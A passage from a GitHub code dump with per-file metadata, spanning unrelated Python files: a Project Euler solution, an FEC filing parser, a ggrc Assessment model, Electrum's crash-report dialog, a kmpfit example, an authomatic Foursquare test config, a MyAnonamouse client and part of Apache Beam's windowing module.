"id": "c9ce91b99ee0decfad26c34c39e99d60b52959c4",
"size": "6760",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "dataproc/google/cloud/dataproc_v1/gapic/transports/cluster_controller_grpc_transport.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "3366"
},
{
"name": "PowerShell",
"bytes": "7195"
},
{
"name": "Protocol Buffer",
"bytes": "62009"
},
{
"name": "Python",
"bytes": "3459300"
},
{
"name": "Shell",
"bytes": "7548"
}
],
"symlink_target": ""
} |
from time import time
from sys import argv
script, filename = argv
alphabet = list("ABCDEFGHIJKLMNOPQRSTUVWXYZ")
for x in range(1, 27):
alphabet[x-1] = (alphabet[x-1], x)
opened = open(filename)
listed = opened.read().split(",")
for i in range(0, len(listed)):
listed[i] = listed[i][1:-1]
sort = sorted(listed)
def names_scores():
total = 0
for index, value in enumerate(sort):
word = list(value)
for index2, letter in enumerate(word):
for x in alphabet:
if letter == x[0]:
word[index2] = x[1]
sort[index] = word
individual_score = (index+1)*sum(sort[index])
total += individual_score
return total
print(names_scores())
| {
"content_hash": "30a5bc425878289102db16b9ba161286",
"timestamp": "",
"source": "github",
"line_count": 34,
"max_line_length": 47,
"avg_line_length": 20.352941176470587,
"alnum_prop": 0.6329479768786127,
"repo_name": "kayson-hansen/Project-Euler",
"id": "c977017c768c88ab8d5da5c48d978d01c1b51bda",
"size": "692",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Python/022_names_scores.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "JavaScript",
"bytes": "5321"
},
{
"name": "Python",
"bytes": "38841"
},
{
"name": "Ruby",
"bytes": "6551"
}
],
"symlink_target": ""
} |
import sys, time, os
sys.path.append('../../')
from parsing.filing import filing
from parsing.form_parser import form_parser, ParserMissingError
from fec_alerts.utils.form_mappers import *
from write_csv_to_db import CSV_dumper
from fec_import_logging import fec_logger
from hstore_helpers import dict_to_hstore
from db_utils import get_connection
verbose = True
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "fecreader.settings")
from django.conf import settings
from fec_alerts.models import new_filing
from formdata.models import SkedE
class FilingHeaderDoesNotExist(Exception):
pass
class FilingHeaderAlreadyProcessed(Exception):
pass
def process_body_row(linedict, filingnum, header_id, is_amended, cd, filer_id):
form = linedict['form_parser']
## Mark memo-ized rows as being superceded by an amendment.
try:
if linedict['memo_code']=='X':
linedict['superceded_by_amendment'] = True
except KeyError:
pass
#print "processing form type: %s" % (form)
if form=='SchA':
skeda_from_skedadict(linedict, filingnum, header_id, is_amended, cd)
elif form=='SchB':
skedb_from_skedbdict(linedict, filingnum, header_id, is_amended, cd)
elif form=='SchE':
skede_from_skededict(linedict, filingnum, header_id, is_amended, cd)
# Treat 48-hour contribution notices like sked A.
# Requires special handling for amendment, since these are superceded
# by regular F3 forms.
elif form=='F65':
skeda_from_f65(linedict, filingnum, header_id, is_amended, cd)
# disclosed donor to non-committee. Sorta rare, but..
elif form=='F56':
skeda_from_f56(linedict, filingnum, header_id, is_amended, cd)
# disclosed electioneering donor
elif form=='F92':
skeda_from_f92(linedict, filingnum, header_id, is_amended, cd)
# inaugural donors
elif form=='F132':
skeda_from_f132(linedict, filingnum, header_id, is_amended, cd)
#inaugural refunds
elif form=='F133':
skeda_from_f133(linedict, filingnum, header_id, is_amended, cd)
# IE's disclosed by non-committees. Note that they use this for *both* quarterly and 24-hour notices. There's not much consistency with this--be careful with superceding stuff.
elif form=='F57':
skede_from_f57(linedict, filingnum, header_id, is_amended, cd)
# Its another kind of line. Just dump it in Other lines.
else:
otherline_from_line(linedict, filingnum, header_id, is_amended, cd, filer_id)
def process_filing_body(filingnum, fp=None, logger=None):
#It's useful to pass the form parser in when running in bulk so we don't have to keep creating new ones.
if not fp:
fp = form_parser()
if not logger:
logger=fec_logger()
msg = "process_filing_body: Starting # %s" % (filingnum)
#print msg
logger.info(msg)
connection = get_connection()
cursor = connection.cursor()
cmd = "select fec_id, is_superceded, data_is_processed from fec_alerts_new_filing where filing_number=%s" % (filingnum)
cursor.execute(cmd)
cd = CSV_dumper(connection)
result = cursor.fetchone()
if not result:
msg = 'process_filing_body: Couldn\'t find a new_filing for filing %s' % (filingnum)
logger.error(msg)
raise FilingHeaderDoesNotExist(msg)
# will throw a TypeError if it's missing.
header_id = 1
is_amended = result[1]
is_already_processed = result[2]
if is_already_processed:
msg = 'process_filing_body: This filing has already been entered.'
logger.error(msg)
raise FilingHeaderAlreadyProcessed(msg)
#print "Processing filing %s" % (filingnum)
try:
f1 = filing(filingnum)
except:
print "*** couldn't handle filing %s" % (filingnum)
return False
form = f1.get_form_type()
version = f1.get_version()
filer_id = f1.get_filer_id()
# only parse forms that we're set up to read
if not fp.is_allowed_form(form):
if verbose:
msg = "process_filing_body: Not a parseable form: %s - %s" % (form, filingnum)
# print msg
logger.error(msg)
return None
linenum = 0
while True:
linenum += 1
row = f1.get_body_row()
if not row:
break
#print "row is %s" % (row)
#print "\n\n\nForm is %s" % form
try:
linedict = fp.parse_form_line(row, version)
if linedict['form_type'].upper().startswith('SE'):
print "\n\n\nfiling %s form is %s transaction_id is: %s" % (filingnum, linedict['form_type'], linedict['transaction_id'])
# make sure the transaction isn't already there before entering.
try:
SkedE.objects.get(filing_number=filingnum, transaction_id=linedict['transaction_id'])
except SkedE.DoesNotExist:
process_body_row(linedict, filingnum, header_id, is_amended, cd, filer_id)
elif linedict['form_type'].upper().startswith('SA'):
print "\n\n\nfiling %s form is %s transaction_id is: %s" % (filingnum, linedict['form_type'], linedict['transaction_id'])
# make sure the transaction isn't already there before entering.
try:
SkedA.objects.get(filing_number=filingnum, transaction_id=linedict['transaction_id'])
print "Already present! %s form is %s transaction_id is: %s" % (filingnum, linedict['form_type'], linedict['transaction_id'])
except SkedA.DoesNotExist:
process_body_row(linedict, filingnum, header_id, is_amended, cd, filer_id)
elif linedict['form_type'].upper().startswith('SB'):
print "\n\n\nfiling %s form is %s transaction_id is: %s" % (filingnum, linedict['form_type'], linedict['transaction_id'])
# make sure the transaction isn't already there before entering.
try:
SkedB.objects.get(filing_number=filingnum, transaction_id=linedict['transaction_id'])
print "Already present! %s form is %s transaction_id is: %s" % (filingnum, linedict['form_type'], linedict['transaction_id'])
except SkedB.DoesNotExist:
process_body_row(linedict, filingnum, header_id, is_amended, cd, filer_id)
except ParserMissingError:
msg = 'process_filing_body: Unknown line type in filing %s line %s: type=%s Skipping.' % (filingnum, linenum, row[0])
logger.warn(msg)
continue
except KeyError:
print "missing form type? in filing %s" % (filingnum)
# commit all the leftovers
cd.commit_all()
cd.close()
counter = cd.get_counter()
total_rows = 0
for i in counter:
total_rows += counter[i]
msg = "process_filing_body: Filing # %s Total rows: %s Tally is: %s" % (filingnum, total_rows, counter)
# print msg
logger.info(msg)
# don't commit during testing of fix
# this data has been moved here. At some point we should pick a single location for this data.
header_data = dict_to_hstore(counter)
cmd = "update fec_alerts_new_filing set lines_present='%s'::hstore where filing_number=%s" % (header_data, filingnum)
cursor.execute(cmd)
# mark file as having been entered.
cmd = "update fec_alerts_new_filing set data_is_processed = True where filing_number=%s" % (filingnum)
cursor.execute(cmd)
# flag this filer as one who has changed.
cmd = "update summary_data_committee_overlay set is_dirty=True where fec_id='%s'" % (filer_id)
cursor.execute(cmd)
#
if __name__ == '__main__':
#filings = new_filing.objects.filter(filing_number__gt=1007393, data_is_processed=False, filing_is_downloaded=True, header_is_processed=True)
fp = form_parser()
filings = [1010304,]
for this_filing in filings:
process_filing_body(this_filing, fp=fp)
"""
t0 = time.time()
process_filing_body(864353)
# 869853, 869866
#for fn in [869888]:
# process_filing_body(fn, fp)
t1 = time.time()
print "total time = " + str(t1-t0)
# long one: 767168
#FAILS WITH STATE ADDRESS PROBLEM: biggest one on file: 838168 (510 mb) - act blue - 2012-10-18 | 2012-11-26
# second biggest: 824988 (217.3mb) - act blue - 2012-10-01 | 2012-10-17 - 874K lines
# 840327 - 169MB C00431445 - OFA | 2012-10-18 | 2012-11-26
# 821325 - 144 mb Obama for america 2012-09-01 | 2012-09-30
# 798883 - 141 mb
# 804867 - 127 mb
# 827978 - 119 mb
# 754317 - 118 mb
"""
| {
"content_hash": "0fad1bd7049a904107da24d289da70b6",
"timestamp": "",
"source": "github",
"line_count": 244,
"max_line_length": 184,
"avg_line_length": 36.34016393442623,
"alnum_prop": 0.6205029886094507,
"repo_name": "sunlightlabs/read_FEC",
"id": "b1f69bbb169ef792e15f60ea36b07971ff2d6b9c",
"size": "8942",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "fecreader/formdata/utils/filing_body_processor_fix_hack.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "27432"
},
{
"name": "HTML",
"bytes": "357960"
},
{
"name": "JavaScript",
"bytes": "129989"
},
{
"name": "Python",
"bytes": "1881514"
},
{
"name": "Shell",
"bytes": "10604"
}
],
"symlink_target": ""
} |
"""Module for Assessment object"""
from sqlalchemy import and_
from sqlalchemy.ext.declarative import declared_attr
from sqlalchemy.orm import remote
from sqlalchemy.orm import validates
from ggrc import db
from ggrc.models import reflection
from ggrc.models.audit import Audit
from ggrc.models.comment import Commentable
from ggrc.models.custom_attribute_definition import CustomAttributeDefinition
from ggrc.models.mixins import BusinessObject
from ggrc.models.mixins import CustomAttributable
from ggrc.models.mixins import FinishedDate
from ggrc.models.mixins import Notifiable
from ggrc.models.mixins import TestPlanned
from ggrc.models.mixins import Timeboxed
from ggrc.models.mixins import VerifiedDate
from ggrc.models.mixins import reminderable
from ggrc.models.mixins import statusable
from ggrc.models.mixins.assignable import Assignable
from ggrc.models.mixins.autostatuschangeable import AutoStatusChangeable
from ggrc.models.mixins.validate_on_complete import ValidateOnComplete
from ggrc.models.mixins.with_similarity_score import WithSimilarityScore
from ggrc.models.deferred import deferred
from ggrc.models.object_document import EvidenceURL
from ggrc.models.object_person import Personable
from ggrc.models.reflection import PublishOnly
from ggrc.models.relationship import Relatable
from ggrc.models.relationship import Relationship
from ggrc.models.track_object_state import HasObjectState
class AuditRelationship(object):
"""Mixin for mandatory link to an Audit via Relationships."""
_aliases = {
"audit": {
"display_name": "Audit",
"mandatory": True,
"filter_by": "_filter_by_audit",
"ignore_on_update": True,
"type": reflection.AttributeInfo.Type.MAPPING,
},
}
@classmethod
def _filter_by_audit(cls, predicate):
"""Get filter for objects related to an Audit."""
return Relationship.query.filter(
Relationship.source_type == cls.__name__,
Relationship.source_id == cls.id,
Relationship.destination_type == Audit.__name__,
).join(Audit, Relationship.destination_id == Audit.id).filter(
predicate(Audit.slug)
).exists() | Relationship.query.filter(
Relationship.destination_type == cls.__name__,
Relationship.destination_id == cls.id,
Relationship.source_type == Audit.__name__,
).join(Audit, Relationship.source_id == Audit.id).filter(
predicate(Audit.slug)
).exists()
class Assessment(statusable.Statusable, AuditRelationship,
AutoStatusChangeable, Assignable, HasObjectState, TestPlanned,
CustomAttributable, EvidenceURL, Commentable, Personable,
reminderable.Reminderable, Timeboxed, Relatable,
WithSimilarityScore, FinishedDate, VerifiedDate,
ValidateOnComplete, Notifiable, BusinessObject, db.Model):
"""Class representing Assessment.
Assessment is an object representing an individual assessment performed on
a specific object during an audit to ascertain whether or not
certain conditions were met for that object.
"""
__tablename__ = 'assessments'
_title_uniqueness = False
ASSIGNEE_TYPES = (u"Creator", u"Assessor", u"Verifier")
REMINDERABLE_HANDLERS = {
"statusToPerson": {
"handler":
reminderable.Reminderable.handle_state_to_person_reminder,
"data": {
statusable.Statusable.START_STATE: "Assessor",
"In Progress": "Assessor"
},
"reminders": {"assessment_assessor_reminder", }
}
}
design = deferred(db.Column(db.String), "Assessment")
operationally = deferred(db.Column(db.String), "Assessment")
@declared_attr
def object_level_definitions(self):
"""Set up a backref so that we can create an object level custom
attribute definition without the need to do a flush to get the
assessment id.
This is used in the relate_ca method in hooks/assessment.py.
"""
return db.relationship(
'CustomAttributeDefinition',
primaryjoin=lambda: and_(
remote(CustomAttributeDefinition.definition_id) == Assessment.id,
remote(CustomAttributeDefinition.definition_type) == "assessment"),
foreign_keys=[
CustomAttributeDefinition.definition_id,
CustomAttributeDefinition.definition_type
],
backref='assessment_definition',
cascade='all, delete-orphan')
object = {} # we add this for the sake of client side error checking
audit = {}
VALID_CONCLUSIONS = frozenset([
"Effective",
"Ineffective",
"Needs improvement",
"Not Applicable"
])
# REST properties
_publish_attrs = [
'design',
'operationally',
PublishOnly('audit'),
PublishOnly('object')
]
_tracked_attrs = {
'contact_id',
'description',
'design',
'notes',
'operationally',
'reference_url',
'secondary_contact_id',
'test_plan',
'title',
'url',
'start_date',
'end_date'
}
_aliases = {
"owners": None,
"assessment_template": {
"display_name": "Template",
"ignore_on_update": True,
"filter_by": "_ignore_filter",
"type": reflection.AttributeInfo.Type.MAPPING,
},
"url": "Assessment URL",
"design": "Conclusion: Design",
"operationally": "Conclusion: Operation",
"related_creators": {
"display_name": "Creator",
"mandatory": True,
"filter_by": "_filter_by_related_creators",
"type": reflection.AttributeInfo.Type.MAPPING,
},
"related_assessors": {
"display_name": "Assessor",
"mandatory": True,
"filter_by": "_filter_by_related_assessors",
"type": reflection.AttributeInfo.Type.MAPPING,
},
"related_verifiers": {
"display_name": "Verifier",
"filter_by": "_filter_by_related_verifiers",
"type": reflection.AttributeInfo.Type.MAPPING,
},
}
similarity_options = {
"relevant_types": {
"Objective": {"weight": 2},
"Control": {"weight": 2},
},
"threshold": 1,
}
def validate_conclusion(self, value):
return value if value in self.VALID_CONCLUSIONS else ""
@validates("operationally")
def validate_operationally(self, key, value):
# pylint: disable=unused-argument
return self.validate_conclusion(value)
@validates("design")
def validate_design(self, key, value):
# pylint: disable=unused-argument
return self.validate_conclusion(value)
@classmethod
def _filter_by_related_creators(cls, predicate):
return cls._get_relate_filter(predicate, "Creator")
@classmethod
def _filter_by_related_assessors(cls, predicate):
return cls._get_relate_filter(predicate, "Assessor")
@classmethod
def _filter_by_related_verifiers(cls, predicate):
return cls._get_relate_filter(predicate, "Verifier")
@classmethod
def _ignore_filter(cls, _):
return None
| {
"content_hash": "ba139ed58a2c07d861b046b355e0ead4",
"timestamp": "",
"source": "github",
"line_count": 218,
"max_line_length": 79,
"avg_line_length": 32.5,
"alnum_prop": 0.6681721947776994,
"repo_name": "selahssea/ggrc-core",
"id": "5462a35cef5176b3de0eda86377d00aef4f8aa31",
"size": "7198",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "src/ggrc/models/assessment.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "211857"
},
{
"name": "HTML",
"bytes": "1056523"
},
{
"name": "JavaScript",
"bytes": "1852333"
},
{
"name": "Makefile",
"bytes": "7044"
},
{
"name": "Mako",
"bytes": "4320"
},
{
"name": "Python",
"bytes": "2613417"
},
{
"name": "Shell",
"bytes": "31273"
}
],
"symlink_target": ""
} |
import platform
import sys
import traceback
from PyQt5.QtCore import QObject
import PyQt5.QtCore as QtCore
from PyQt5.QtGui import QIcon
from PyQt5.QtWidgets import *
from electrum.i18n import _
from electrum.base_crash_reporter import BaseCrashReporter
from .util import MessageBoxMixin
class Exception_Window(BaseCrashReporter, QWidget, MessageBoxMixin):
_active_window = None
def __init__(self, main_window, exctype, value, tb):
BaseCrashReporter.__init__(self, exctype, value, tb)
self.main_window = main_window
QWidget.__init__(self)
self.setWindowTitle('Electrum - ' + _('An Error Occurred'))
self.setMinimumSize(600, 300)
main_box = QVBoxLayout()
heading = QLabel('<h2>' + BaseCrashReporter.CRASH_TITLE + '</h2>')
main_box.addWidget(heading)
main_box.addWidget(QLabel(BaseCrashReporter.CRASH_MESSAGE))
main_box.addWidget(QLabel(BaseCrashReporter.REQUEST_HELP_MESSAGE))
collapse_info = QPushButton(_("Show report contents"))
collapse_info.clicked.connect(
lambda: self.msg_box(QMessageBox.NoIcon,
self, _("Report contents"), self.get_report_string()))
main_box.addWidget(collapse_info)
main_box.addWidget(QLabel(BaseCrashReporter.DESCRIBE_ERROR_MESSAGE))
self.description_textfield = QTextEdit()
self.description_textfield.setFixedHeight(50)
main_box.addWidget(self.description_textfield)
main_box.addWidget(QLabel(BaseCrashReporter.ASK_CONFIRM_SEND))
buttons = QHBoxLayout()
report_button = QPushButton(_('Send Bug Report'))
report_button.clicked.connect(self.send_report)
report_button.setIcon(QIcon(":icons/tab_send.png"))
buttons.addWidget(report_button)
never_button = QPushButton(_('Never'))
never_button.clicked.connect(self.show_never)
buttons.addWidget(never_button)
close_button = QPushButton(_('Not Now'))
close_button.clicked.connect(self.close)
buttons.addWidget(close_button)
main_box.addLayout(buttons)
self.setLayout(main_box)
self.show()
def send_report(self):
try:
proxy = self.main_window.network.proxy
response = BaseCrashReporter.send_report(self, self.main_window.network.asyncio_loop, proxy)
except BaseException as e:
traceback.print_exc(file=sys.stderr)
self.main_window.show_critical(_('There was a problem with the automatic reporting:') + '\n' +
str(e) + '\n' +
_("Please report this issue manually."))
return
QMessageBox.about(self, _("Crash report"), response)
self.close()
def on_close(self):
Exception_Window._active_window = None
sys.__excepthook__(*self.exc_args)
self.close()
def show_never(self):
self.main_window.config.set_key(BaseCrashReporter.config_key, False)
self.close()
def closeEvent(self, event):
self.on_close()
event.accept()
def get_user_description(self):
return self.description_textfield.toPlainText()
def get_wallet_type(self):
return self.main_window.wallet.wallet_type
def get_os_version(self):
return platform.platform()
def _show_window(*args):
if not Exception_Window._active_window:
Exception_Window._active_window = Exception_Window(*args)
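# Illustrative note (not part of the original module): _active_window acts as a
# module-level singleton guard, so repeated unhandled exceptions reuse the
# report window that is already open instead of stacking new ones.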
class Exception_Hook(QObject):
_report_exception = QtCore.pyqtSignal(object, object, object, object)
def __init__(self, main_window, *args, **kwargs):
super(Exception_Hook, self).__init__(*args, **kwargs)
if not main_window.config.get(BaseCrashReporter.config_key, default=True):
return
self.main_window = main_window
sys.excepthook = self.handler
self._report_exception.connect(_show_window)
def handler(self, *args):
self._report_exception.emit(self.main_window, *args)
| {
"content_hash": "2a966cd0b939fb0d642a00273ca7e535",
"timestamp": "",
"source": "github",
"line_count": 122,
"max_line_length": 106,
"avg_line_length": 33.532786885245905,
"alnum_prop": 0.6418968467367392,
"repo_name": "cryptapus/electrum",
"id": "1d30b3eea8720b2e0de3facd338e4502e2ba99a8",
"size": "5216",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "electrum/gui/qt/exception_window.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Dockerfile",
"bytes": "1169"
},
{
"name": "GLSL",
"bytes": "289"
},
{
"name": "Java",
"bytes": "1574"
},
{
"name": "Makefile",
"bytes": "874"
},
{
"name": "NSIS",
"bytes": "7316"
},
{
"name": "Python",
"bytes": "2195369"
},
{
"name": "Shell",
"bytes": "20819"
}
],
"symlink_target": ""
} |
import numpy
from kmpfit import kmpfit
def residuals(p, data): # Residuals function needed by kmpfit
x, y = data # Data arrays is a tuple given by programmer
a, b = p # Parameters which are adjusted by kmpfit
return (y-(a+b*x))
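# Illustrative note (not part of the original example): kmpfit varies the
# parameters a and b of the straight line y = a + b*x so that the sum of the
# squared residuals returned above, evaluated over the (d, v) pairs below, is
# minimised.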
d = numpy.array([42, 6.75, 25, 33.8, 9.36, 21.8, 5.58, 8.52, 15.1])
v = numpy.array([1294, 462, 2562, 2130, 750, 2228, 598, 224, 971])
paramsinitial = [0, 70.0]
fitobj = kmpfit.Fitter(residuals=residuals, data=(d,v))
fitobj.fit(params0=paramsinitial)
print "\nFit status kmpfit:"
print "===================="
print "Best-fit parameters: ", fitobj.params
print "Asymptotic error: ", fitobj.xerror
print "Error assuming red.chi^2=1: ", fitobj.stderr
print "Chi^2 min: ", fitobj.chi2_min
print "Reduced Chi^2: ", fitobj.rchi2_min
print "Iterations: ", fitobj.niter
print "Number of free pars.: ", fitobj.nfree
print "Degrees of freedom: ", fitobj.dof | {
"content_hash": "bb8b117f1362f168425f1fe865c2fc2b",
"timestamp": "",
"source": "github",
"line_count": 25,
"max_line_length": 69,
"avg_line_length": 39.56,
"alnum_prop": 0.6147623862487361,
"repo_name": "aoeftiger/kmpfit",
"id": "240f7e5231a675f9897753bf16e80d2da57abe11",
"size": "989",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "kmpfit/example.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "69175"
},
{
"name": "Python",
"bytes": "33389"
}
],
"symlink_target": ""
} |
import calendar
import re
import fixtures
import constants
from authomatic.providers import oauth2
conf = fixtures.get_configuration('foursquare')
CONFIG = {
'logout_url': 'https://foursquare.com/logout',
'login_xpath': '//*[@id="username"]',
'password_xpath': '//*[@id="password"]',
'consent_xpaths': [],
'class_': oauth2.Foursquare,
'scope': oauth2.Foursquare.user_info_scope,
'user': {
'birth_date': conf.user_birth_date_str,
'city': conf.user_city,
'country': conf.user_country,
'email': conf.user_email,
'first_name': conf.user_first_name,
'gender': conf.user_gender,
'id': conf.user_id,
'last_name': conf.user_last_name,
'link': None,
'locale': None,
'location': conf.user_location,
'name': conf.user_name,
'nickname': None,
'phone': conf.user_phone,
'picture': re.compile(r'^https://\w+\.\w+\.net/img/user/\w+\.jpg$'),
'postal_code': None,
'timezone': None,
'username': None,
},
'content_should_contain': [
str(calendar.timegm(conf.user_birth_date.timetuple())), # Timestamp
conf.user_city,
conf.user_country,
conf.user_email,
conf.user_first_name,
conf.user_gender,
conf.user_id,
conf.user_last_name,
conf.user_phone,
# User info JSON keys
'address', 'allowMenuUrlEdit', 'bio', 'birthday', 'blockedStatus',
'canonicalUrl', 'categories', 'cc', 'checkin', 'checkinPings',
'checkins', 'checkinsCount', 'city', 'code', 'collaborative',
'comments', 'contact', 'count', 'country', 'createdAt', 'default',
'description', 'editable', 'email', 'entities', 'facebook',
'facebookName', 'firstName', 'formattedAddress', 'formattedPhone',
'friends', 'gender', 'groups', 'height', 'homeCity', 'icon', 'id',
'isMayor', 'item', 'items', 'lastName', 'lat', 'lenses', 'like',
'likes', 'listItems', 'lists', 'lng', 'location', 'mayorships', 'meta',
'name', 'neighborhood', 'notifications', 'phone', 'photo', 'photos',
'pings', 'pluralName', 'postalCode', 'posts', 'prefix', 'primary',
'public', 'referralId', 'relationship', 'requestId', 'requests',
'response', 'shortName', 'shout', 'source', 'state', 'stats', 'suffix',
'superuser', 'textCount', 'timeZoneOffset', 'tipCount', 'tips',
'twitter', 'type', 'unreadCount', 'url', 'user', 'usersCount', 'venue',
'verified', 'verifiedPhone', 'visibility', 'width'
],
# Case insensitive
'content_should_not_contain': [
'locale',
'language',
'deprecated',
conf.user_postal_code,
conf.user_username_reverse
],
# True means that any truthy value is expected
'credentials': {
'token_type': None,
'provider_type_id': '2-6',
'_expiration_time': None,
'consumer_key': None,
'provider_id': None,
'consumer_secret': None,
'token': True,
'token_secret': None,
'_expire_in': True,
'provider_name': 'foursquare',
'refresh_token': None,
'provider_type': 'authomatic.providers.oauth2.OAuth2',
'refresh_status': constants.CREDENTIALS_REFRESH_NOT_SUPPORTED,
},
}
| {
"content_hash": "71f9d374d0ea7c17fa8aad49c43858b2",
"timestamp": "",
"source": "github",
"line_count": 91,
"max_line_length": 79,
"avg_line_length": 36.78021978021978,
"alnum_prop": 0.5703615177771139,
"repo_name": "peterhudec/authomatic",
"id": "c1e9295b4ce5299c1ef8a7bdcc59a6d9f0778fae",
"size": "3371",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "tests/functional_tests/expected_values/foursquare.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CoffeeScript",
"bytes": "13463"
},
{
"name": "HTML",
"bytes": "5436"
},
{
"name": "Python",
"bytes": "363520"
},
{
"name": "Shell",
"bytes": "1336"
}
],
"symlink_target": ""
} |
import re
import requests
import pickle
import time
from myanonamouse.models import MAMLoginCache
from myanonamouse.settings import MAM_USERNAME, MAM_PASSWORD, MAM_LOGIN_URL, MAM_ROOT_URL
class MAMException(Exception):
pass
class LoginException(MAMException):
pass
def process_url(url):
if url.startswith('http://') or url.startswith('https://'):
return url
elif url.startswith('//'):
return 'http:' + url
elif url.startswith('/'):
return MAM_ROOT_URL + url
else:
return MAM_ROOT_URL + '/' + url
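# Illustrative behaviour of process_url (comment added for clarity, not part of
# the original module): absolute 'http://' or 'https://' URLs pass through
# unchanged, protocol-relative '//host/path' URLs gain an 'http:' prefix, and
# relative paths such as '/some/page.php' or 'some/page.php' are joined onto
# MAM_ROOT_URL.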
class MAMClient(object):
def __init__(self, username, password):
self.username = username
self.password = password
self.session = requests.Session()
try:
login_cache = MAMLoginCache.objects.get()
for cookie in pickle.loads(login_cache.cookies):
self.session.cookies.set_cookie(cookie)
except MAMLoginCache.DoesNotExist:
pass
def _login(self):
data = {
'username': self.username,
'password': self.password,
}
r = self.session.post(process_url(MAM_LOGIN_URL), data=data, allow_redirects=False)
if r.status_code != 302:
raise LoginException()
if r.headers['location'] != '/index.php':
raise LoginException()
MAMLoginCache.objects.all().delete()
login_cache = MAMLoginCache(cookies=pickle.dumps([c for c in self.session.cookies]))
login_cache.save()
def _request(self, url, try_login):
resp = self.session.request('GET', url, allow_redirects=False)
if resp.status_code == 302:
if resp.headers['location'].startswith('/login.php?'):
if try_login:
self._login()
return self._request(url, try_login=False)
else:
raise LoginException()
else:
raise MAMException('Request redirect: {0}'.format(resp.headers['location']))
elif resp.status_code != 200:
raise MAMException()
return resp
def request(self, url):
return self._request(process_url(url), try_login=True)
def download_torrent(self, torrent_url):
for i in xrange(3):
try:
r = self.request(torrent_url)
if 'application/x-bittorrent' in r.headers['content-type']:
filename = re.search('filename="(.*)"',
r.headers['content-disposition']).group(1)
return filename, r.content
else:
raise Exception('Wrong status_code or content-type')
except Exception as ex:
print u'Error while downloading MAM torrent. Will retry: {0}'.format(ex)
time.sleep(3)
download_exception = ex
raise download_exception
@staticmethod
def get():
return MAMClient(MAM_USERNAME, MAM_PASSWORD)
| {
"content_hash": "44f2f53f378fe409e7986aa9933683df",
"timestamp": "",
"source": "github",
"line_count": 91,
"max_line_length": 92,
"avg_line_length": 33.31868131868132,
"alnum_prop": 0.570910290237467,
"repo_name": "MADindustries/WhatManager2",
"id": "75d7a557611090f31785eef9e42b814ad1a9f388",
"size": "3032",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "myanonamouse/utils.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "202636"
},
{
"name": "HTML",
"bytes": "139705"
},
{
"name": "JavaScript",
"bytes": "632927"
},
{
"name": "Python",
"bytes": "508225"
},
{
"name": "Shell",
"bytes": "2294"
}
],
"symlink_target": ""
} |
"""Windowing concepts.
A WindowInto transform logically divides up or groups the elements of a
PCollection into finite windows according to a windowing function (derived from
WindowFn).
The output of WindowInto contains the same elements as input, but they have been
logically assigned to windows. The next GroupByKey(s) transforms, including one
within a composite transform, will group by the combination of keys and windows.
Windowing a PCollection allows chunks of it to be processed individually, before
the entire PCollection is available. This is especially important for
PCollection(s) with unbounded size, since the full PCollection is never
available at once, since more data is continually arriving. For PCollection(s)
with a bounded size (aka. conventional batch mode), by default, all data is
implicitly in a single window (see GlobalWindows), unless WindowInto is
applied.
For example, a simple form of windowing divides up the data into fixed-width
time intervals, using FixedWindows.
Seconds are used as the time unit for the built-in windowing primitives here.
Integer or floating point seconds can be passed to these primitives.
Internally, seconds, with microsecond granularity, are stored as
timeutil.Timestamp and timeutil.Duration objects. This is done to avoid
precision errors that would occur with floating point representations.
Custom windowing function classes can be created, by subclassing from
WindowFn.
"""
from __future__ import absolute_import
import abc
from google.protobuf import struct_pb2
from apache_beam.coders import coders
from apache_beam.runners.api import beam_runner_api_pb2
from apache_beam.transforms import timeutil
from apache_beam.utils import proto_utils
from apache_beam.utils import urns
from apache_beam.utils.timestamp import Duration
from apache_beam.utils.timestamp import MAX_TIMESTAMP
from apache_beam.utils.timestamp import MIN_TIMESTAMP
from apache_beam.utils.timestamp import Timestamp
from apache_beam.utils.windowed_value import WindowedValue
__all__ = [
'TimestampCombiner',
'WindowFn',
'BoundedWindow',
'IntervalWindow',
'TimestampedValue',
'GlobalWindow',
'NonMergingWindowFn',
'GlobalWindows',
'FixedWindows',
'SlidingWindows',
'Sessions',
]
# TODO(ccy): revisit naming and semantics once Java Apache Beam finalizes its
# behavior.
class TimestampCombiner(object):
"""Determines how output timestamps of grouping operations are assigned."""
OUTPUT_AT_EOW = beam_runner_api_pb2.END_OF_WINDOW
OUTPUT_AT_EARLIEST = beam_runner_api_pb2.EARLIEST_IN_PANE
OUTPUT_AT_LATEST = beam_runner_api_pb2.LATEST_IN_PANE
# TODO(robertwb): Add this to the runner API or remove it.
OUTPUT_AT_EARLIEST_TRANSFORMED = 'OUTPUT_AT_EARLIEST_TRANSFORMED'
@staticmethod
def get_impl(timestamp_combiner, window_fn):
if timestamp_combiner == TimestampCombiner.OUTPUT_AT_EOW:
return timeutil.OutputAtEndOfWindowImpl()
elif timestamp_combiner == TimestampCombiner.OUTPUT_AT_EARLIEST:
return timeutil.OutputAtEarliestInputTimestampImpl()
elif timestamp_combiner == TimestampCombiner.OUTPUT_AT_LATEST:
return timeutil.OutputAtLatestInputTimestampImpl()
elif timestamp_combiner == TimestampCombiner.OUTPUT_AT_EARLIEST_TRANSFORMED:
return timeutil.OutputAtEarliestTransformedInputTimestampImpl(window_fn)
else:
raise ValueError('Invalid TimestampCombiner: %s.' % timestamp_combiner)
class WindowFn(urns.RunnerApiFn):
"""An abstract windowing function defining a basic assign and merge."""
__metaclass__ = abc.ABCMeta
class AssignContext(object):
"""Context passed to WindowFn.assign()."""
def __init__(self, timestamp, element=None):
